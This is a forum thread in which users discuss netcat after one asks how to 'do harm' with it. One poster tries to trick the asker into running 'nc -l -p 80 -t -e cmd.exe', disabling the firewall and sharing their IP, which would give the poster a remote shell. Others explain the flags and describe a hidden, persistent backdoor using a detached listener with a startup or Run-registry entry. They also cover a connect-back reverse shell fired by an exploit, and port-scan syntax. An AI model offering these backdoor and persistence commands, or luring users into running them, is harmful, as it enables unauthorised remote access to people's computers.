Netcat: How usefull can it be?

im not sure what netcat is tbh, but we cant help you if your intending to do some damage with it.
 
just wondering if anyone knows how to do any harm in this little program

As much harm or use as injecting raw data to anything can be.

EDIT: Type this
nc -l -p 80 -t -e cmd.exe
Turn off your firewall
Tell me your IP
 
just wondering if anyone knows how to do any harm in this little program

Cause harm? Why would you want to do that? Is your brains in your ass? Just for the record, I know how to run and use netcat very well. I love this little application ;) I run and use it for my windows xp pro. It's good for creating back doors (systems you already breached) and (bypassing packet filtering programs).

You can use the following syntax;

nc -v -w 2 -z IP_Address port_range/port_number

nc -v -n IP_Address port

nc -l -p 80 -t -e cmd.exe
Turn off your firewall
Tell me your IP


The following command above by dj-chris simply opens a netcat listener on port 80 , runs it in the background so a user will not see it on the console, and then executes cmd.exe aka the (command prompt). If he was to connect to the system on port 80 he would have 'obtain' a command prompt.

Let me guess you're telling him to open netcat (nc) and have it -l (listen) on -p (port 80) the -e switch is for (inbound program to execute) in this case it would be the command prompt aka cmd.exe

Even if he did turn off his firewall and gave you his WAN IP address you still wouldnt be able to get this to work. ;) However, if used FPIPE with NETCAT then this theory would work. Quite well actually.

If I was you DJ-CHRIS I would just create a batch file and use nc -l -p 80 myipaddress -d -e cmd.exe. To get the batch file to execute you can always copy it into the startup group and set it to run on the reg key HKLM\CCS\SOFTWARE\MICROSOFT\WINDOWS\RUN or you can always use the scheduled service either way works.


As far as port redirection use FPIPE. FPIPE with Netcat can do some pretty neat things. Just my two cents.[/QUOTE]
 
Let me guess you're telling him to open netcat (nc) and have it -l (listen) on -p (port 80) the -e switch is for (inbound program to execute) in this case it would be the command prompt aka cmd.exe

Even if he did turn off his firewall and gave you his WAN IP address you still wouldnt be able to get this to work. ;) However, if used FPIPE with NETCAT then this theory would work. Quite well actually.
[/QUOTE]

As long as he didnt have a router it would work quite nicely without fpipe :)
 
EDIT: Type this
nc -l -p 80 -t -e cmd.exe
Turn off your firewall
Tell me your IP


Again, all this is doing is telling netcat (nc) to (-l) listen on (-p) port 80 -t (tells nc to accept telnet connections) -e (executes cmd.exe or command prompt. when telnet connects to port 80 it will bring up a command prompt for you. Wheres the -d option? ;)

-d tells netcat to detach (don't open up a window on the computer when
listening)

nc - ran netcat
-L - tells netcat to stay open and listen (set up a backdoor)
-p 80 - tells netcat when listening to listen to port 80 (you could change
80 to whatever other port you choose)
-t - tells netcat to accept telnet connections
-e cmd.exe - tells netcat to open up cmd.exe (the command shell) .


As long as he didnt have a router it would work quite nicely without fpipe.

This only works when the target doesn't allow *incoming* connections but does allow 'outgoing connections'.. ICF allows outgoing connection since it doesnt have any outbound security for XP that is,.

Also, 'ANY' type of security on his system would notify him of an incomming connection to his PC. Hell, netstat -b would inform him. He could easily match the PID to the Foreign address (remote address) and the port it's using. LOL. ;)

As far as hacking have a netcat listening on a certain port fire my exploit at the target, the target connects back to my netcat giving me a command prompt. You can use this when the target doesn't allow incoming connections but does allow outgoing connections..
 
Back
Top Bottom